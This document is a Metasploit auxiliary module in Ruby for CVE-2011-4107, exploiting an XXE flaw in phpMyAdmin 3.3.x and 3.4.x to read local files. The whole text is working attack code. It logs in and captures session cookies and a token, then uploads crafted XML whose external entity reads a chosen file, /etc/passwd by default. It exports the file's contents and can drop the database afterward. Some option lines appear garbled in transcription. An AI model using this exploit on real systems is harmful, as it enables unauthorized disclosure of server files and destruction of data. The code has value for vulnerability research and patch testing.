# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection # Date: 12-01-2012 # Author: Marco Batista # Blog Link: # Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7 # CVE : CVE-2011-4107 require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection', 'Version' => '1.0', 'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server). The attacker must be logged in to MySQL via phpMyAdmin. Works on Windows and Linux Versions 3.3.X and 3.4.X}, 'References' => [ [ 'CVE', '2011-4107' ], [ 'OSVDB', '76798' ], [ 'BID', '50497' ], [ 'URL', ''], ], 'Author' => [ 'Marco Batista' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(80),'FILE', [ true, "File to read", '/etc/passwd']),'USER', [ true, "Username", 'root']),'PASS', [ false, "Password", 'password']),'DB', [ true, "Database to use/create", 'hddaccess']),'TBL', [ true, "Table to use/create and read the file to", 'files']),'APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),'DROP', [ true, "Drop database after reading file?", 'true']), ],self.class) end def loginprocess # HTTP GET TO GET SESSION VALUES getresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method' => 'GET', 'version' => '1.1', }, 25) if (getresponse.nil?) print_error("no response for #{ip}:#{rport}") elsif (getresponse.code == 200) print_status("Received #{getresponse.code} from #{rhost}:#{rport}") elsif (getresponse and getresponse.code == 302 or getresponse.code == 301) print_status("Received 302 to #{getresponse.headers['Location']}") else print_error("Received #{getresponse.code} from #{rhost}:#{rport}") end valuesget = getresponse.headers["Set-Cookie"] varsget = valuesget.split(" ") #GETTING THE VARIABLES NEEDED phpMyAdmin = varsget.grep(/phpMyAdmin/).last pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last # END HTTP GET # LOGIN POST REQUEST TO GET COOKIE VALUE postresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'application/x-www-form-urlencoded', 'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}" }, 'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1' }, 25) if (postresponse["Location"].nil?) print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}") tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last else tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last end valuespost = postresponse.headers["Set-Cookie"] varspost = valuespost.split(" ") #GETTING THE VARIABLES NEEDED pmaUser = varspost.grep(/pmaUser-1/).last pmaPass = varspost.grep(/pmaPass-1/).last return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue # END OF LOGIN POST REQUEST rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e print_error(e.message) rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e print_error(e.message) end def readfile(cookie,tokenvalue) #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN getfiles = send_request_cgi({ 'uri' => datastore['APP']+'/export.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, 'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data' }, 25) if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?) print_error("Error reading the file... not enough privilege? login error?") else print_status("#{getfiles.body}") end end def dropdatabase(cookie,tokenvalue) dropdb = send_request_cgi({ 'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false', 'method' => 'GET', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, }, 25) print_status("Dropping database: "+datastore['DB']) end def run cookie,tokenvalue = loginprocess() print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}") craftedXML = "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n" craftedXML << tokenvalue+"\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n" craftedXML << "server\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n" craftedXML << "Content-Type: text/xml\n\n" craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" craftedXML << "<!DOCTYPE ficheiro [ \n" craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n" craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"\">\n" craftedXML << " <pma:structure_schemas>\n" craftedXML << " <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n" craftedXML << " <pma:table name=\""+datastore['TBL']+"\">\n" craftedXML << " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n" craftedXML << " </pma:table>\n" craftedXML << " </pma:database>\n" craftedXML << " </pma:structure_schemas>\n" craftedXML << " <database name=\""+datastore['DB']+"\">\n" craftedXML << " <table name=\""+datastore['TBL']+"\">\n" craftedXML << " <column name=\"file\">&conteudo;</column>\n" craftedXML << " </table>\n" craftedXML << " </database>\n" craftedXML << "</pma_xml_export>\n\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n" craftedXML << "xml\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n" craftedXML << ",\n\n" craftedXML << "------WebKitFormBoundary3XPL01T--" print_status("Grabbing that #{datastore['FILE']} you want...") res = send_request_cgi({ 'uri' => datastore['APP']+'/import.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T', 'Cookie' => cookie }, 'data' => craftedXML }, 25) readfile(cookie,tokenvalue) if (datastore['DROP'] == "true") dropdatabase(cookie,tokenvalue) else print_status("Database was not dropped: "+datastore['DB']) end end end
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